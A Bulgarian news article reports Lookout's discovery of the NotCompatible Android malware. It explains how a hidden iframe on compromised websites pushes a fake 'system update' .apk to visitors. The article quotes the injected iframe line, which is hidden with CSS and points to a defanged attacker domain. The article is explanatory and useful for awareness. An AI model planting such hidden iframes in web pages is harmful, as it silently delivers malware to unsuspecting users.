Компанията Lookout разкриха нов NotCompatible вирус за Андроид телефони и таблети
Компанията по сигурност на данни за мобилни телефони и устройства Lookout и производител на една от най-идобрите антивирусни Lookout Mobile Security, излезе с новината за предупреждение за нов вид Андроид вирус, който евентуално се разпространява на Андроид телефони и таблети. Идентифициран като "NotCompatible", областа на разпространение на зловредният код е уеб браузъра на Android, който е вграден по подразбиране в мобилната операционна система за .
Преди да запознаем Андроид потребителите с някои факти, те не трябва да изпадат в масова паника. На първо място, зловредният код не изглежда да е толкова пагубен или поне не на този етап. Второ, NotCompatible не може да се инсталира на мобилния телефон без конкретна намеса на потребителя.
Въпреки, че троянските коне, вирусите и другите типове зловреден код най-общо казано локализират и атакуват слабите места на браузърите, до момента са констатирани много малко реални примери за атаки в света на мобилните телефони и устройства. Функцията на зловредният код NotCompatible всъщност не е манипулиране на уеб браузъра на Android телефоните, а нещо повече, основно се възползва от някои от възможните за манипулация не добрите решения в дизайна, за да подхлъзнат да го инсталират не до там запознатите Android потребители.
Работата на Андроид вируса е на следния принцип: Бъгът е внедрен в скрит iframe на заразените уеб сайтове. След което зловредния код се разпространява като се изпраща на потребителя заразен .apk файл до Android телефона или таблета, като маскиран файл за автоматично сваляне. Подобно на всички други вируси освен, че трябва да се изтегли файла, той също така трябва да се стартира (инсталира). След приключване на изтеглянето на файла, уеб сайтът изпраща сигнал чрез баузъра на потребителя за наличие на нов системен ъпдейт. В случай че нищо неподозиращите потребители се подведат, ще инсталират.apk файла и по този начин дават на NotCompatible достъп до мобилния телефон или устройство.
Зловредният код е вложен в долната част на всяка от заразените страници и изглежда така:
iframe style=”visibility: hidden; display: none; display: none;” src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”
Въпреки че, в момента NotCompatible не се асоциира с конкретна заплаха, е възможно Android вируса да функционира като троянски кон или прокси за някаква по-лоша вреда.